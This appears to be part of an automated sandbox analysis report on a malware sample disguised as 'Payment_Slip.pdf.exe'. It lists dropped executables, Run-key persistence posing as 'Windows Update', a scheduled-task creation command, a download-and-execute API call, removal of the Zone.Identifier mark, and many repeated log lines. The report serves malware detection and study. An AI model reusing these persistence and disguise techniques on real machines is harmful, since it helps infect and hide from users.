Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mL1yOx2rBFYlGxdGQM.cs	High entropy of concatenated method names: 'eWjK6wMy8', 'BRZpmaJir', 'GAhv5Syb9', 'YdiE7VJiA', 'YCtD1RUOZ', 'h0whLHPGf', 'd81F6u1bwc0SAnwWb1', 'lnfZjLGrwRr5QTfwox', 'jxSGX1WmW', 'EF4mHcA6U'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, jU3mqX4JiC8fXaRuWG.cs	High entropy of concatenated method names: 'oq3m8GhS2N', 'y8bmfylHu8', 'c84mtrInDC', 'JGEmjYGwsu', 'zOMmRWJOCN', 'OkymepOUDF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, bJtGO9II6JaEOek5Jqh.cs	High entropy of concatenated method names: 'q7um4o7aYo', 'BZomzrx2gO', 'YSqNOkrbVB', 'HwKNI7bGlc', 'DC1N2SnMOO', 'PZANy41hP3', 'bcsN3Kb0Nx', 'Ea1Ncu2SUS', 'TUeNwe8cwW', 'oFTNPPlQfa'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, WAlmw8hg1iD9JBEFRu.cs	High entropy of concatenated method names: 'xiHf6olSRJ', 'IU5fEET5PG', 'WIM8UKvhB8', 'DRr8BONLdy', 'glm8sMFPeg', 'yRX8iqtX05', 'OI18A7rDtE', 'KS78SAjU6a', 'WVi8Hltphl', 'CBd8bOvTCa'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs	High entropy of concatenated method names: 'cCVyc3lRiN', 'zTeywke01j', 'SBsyPGRBgf', 'wQhy8FpRGx', 'wO8yfLtUGT', 'oOZytcyA9G', 'UgFyjCmHVA', 'f7kyem263L', 'kqwydB6Lup', 'hQhyT0iZMy'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, nINbxJCQ3XxrE7Js03.cs	High entropy of concatenated method names: 'BGqgWDwfC8', 'cStg4fumVv', 'if7GOqEG1O', 'G6CGIJENII', 'nbygJmdS3Z', 'nWogQEfY5R', 'Ix9gxcgPT6', 'oXcgYasOpV', 'HA5g16Oi35', 'TnVgMny3g6'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Vex4ilFu8A9XAL3nwL.cs	High entropy of concatenated method names: 'zOmgTGZimL', 'CB5gVgMSKh', 'ToString', 'X5Dgwj0tdk', 'jOZgPNwHFj', 'TlOg82CcIV', 'blogfLMNpv', 'XBFgtM8VnN', 'igAgjdDh3i', 'ichgexJKcY'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, MSJvbOHcHTO0c3bCdq.cs	High entropy of concatenated method names: 'QO4jaretvn', 'jMGjqD98Of', 'MpbjKbm1Rc', 'V3wjp8uKh1', 'fKnj655umG', 'JthjvX3Vf4', 'p0WjEW0Eas', 'b51jnrqRVF', 'XG5jD3h7yy', 'UGqjhu5bfc'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs	High entropy of concatenated method names: 'Ad8PYPNMSv', 'CJYP1UHGGf', 'MxcPM8bIAF', 'Y5yPFucZwN', 'E5QPlSIsoa', 'j9yPCnEMsh', 'mIlPk8F5LR', 'DC5PWDZvKJ', 'z5SPLb8Jay', 'vR9P413nj9'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, QnXqhezuvN7cIpValM.cs	High entropy of concatenated method names: 'VlmmvXcQ5J', 'bAgmn9TmV9', 'IPZmDB51I7', 'OpGm08dtIS', 'AFamo7xICr', 'kokmBOL1h1', 'nI8msjCjni', 'PGPmXO928N', 'VW2masbI4o', 'hjSmqeHVg8'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, ijY91ePT8UGDHEvgSe.cs	High entropy of concatenated method names: 'Dispose', 'v09ILg28Zp', 'RV02oNpKhO', 'TRM936xQoU', 'QnFI4Wp73l', 'TO7Iz7rI6g', 'ProcessDialogKey', 'toV2Onr9uJ', 'dfK2IUumCA', 'B0M22tU3mq'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, NSam4kI3GhkqpuZJciv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j6LuRxG8ip', 'lrXummPSHO', 'ssFuN73QJn', 'Q5iuuZE0AL', 'VnLursiNC9', 'Q3Tu9GtmGB', 'gCpuXGVGeS'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, sBkofI8Vdfu7QC8btk.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cUm2LD7Rw5', 'i7b24pnTml', 'TTY2zK2dBK', 'u65yO0V4ia', 'Qs0yIbfPJj', 'xCqy2DrlnM', 'GdyyymARuD', 'RGITeyIoAWrcZ2DHY7i'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, o5Pu5QAYgvExHeVGbP.cs	High entropy of concatenated method names: 'sWujw0pgrG', 'IdQj87lcB5', 'tVQjtDbXco', 'trat4eKBas', 'YLOtzXryjL', 'xrCjOtjNaQ', 'N8njI3u1I7', 'fd9j2eq6AF', 'LKTjycG0Yp', 'Fklj3ih7UU'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, fynTdqk87r09g28Zpx.cs	High entropy of concatenated method names: 'XTqR7hVKJk', 'XiIRgU5848', 'D0VRRlrsZy', 'hF1RNqP4Ss', 'DepRrP3r2G', 'hr7RXgJvTJ', 'Dispose', 'lOcGwuiNT4', 'UctGP4gmkm', 'ChbG86Y8AZ'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, R5P5Z50j5SaKrgriEl.cs	High entropy of concatenated method names: 'tlBtccHd4u', 'gL1tPfkvy3', 'SaKtffOlhm', 'jWvtjx9upP', 'TwxteyCRXA', 'IX2fljlhWy', 'Ft9fCHLZEO', 'oj8fkTSsOI', 'Qw9fWnDQ2a', 'eBMfLMSCUL'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mnr9uJLyfKUumCAv0M.cs	High entropy of concatenated method names: 'Y44R0aga1H', 'BjNRonM0LP', 'KMBRUBPGSD', 'J2wRBLoiwq', 'haSRsgNLrL', 'IKIRiKA5bX', 'UYwRARp4Pg', 'bpxRSudZcd', 'tMuRHnHE7J', 'sTZRbO6R0o'

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_004063C6 ShellExecuteW,URLDownloadToFileW,

11_2_004063C6

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File created: C:\Users\user\AppData\Local\Temp\dwn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	File created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File created: C:\Users\user\AppData\Roaming\host.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\host.exe	File created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File created: C:\Users\user\AppData\Local\Temp\conserver.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Roaming\host.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_00418A00

Source: C:\Users\user\AppData\Roaming\host.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
Source: C:\Users\user\AppData\Roaming\host.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\host.exe	File opened: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	File opened: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Payment_Slip.pdf.exe

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

11_2_0041A8DA

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
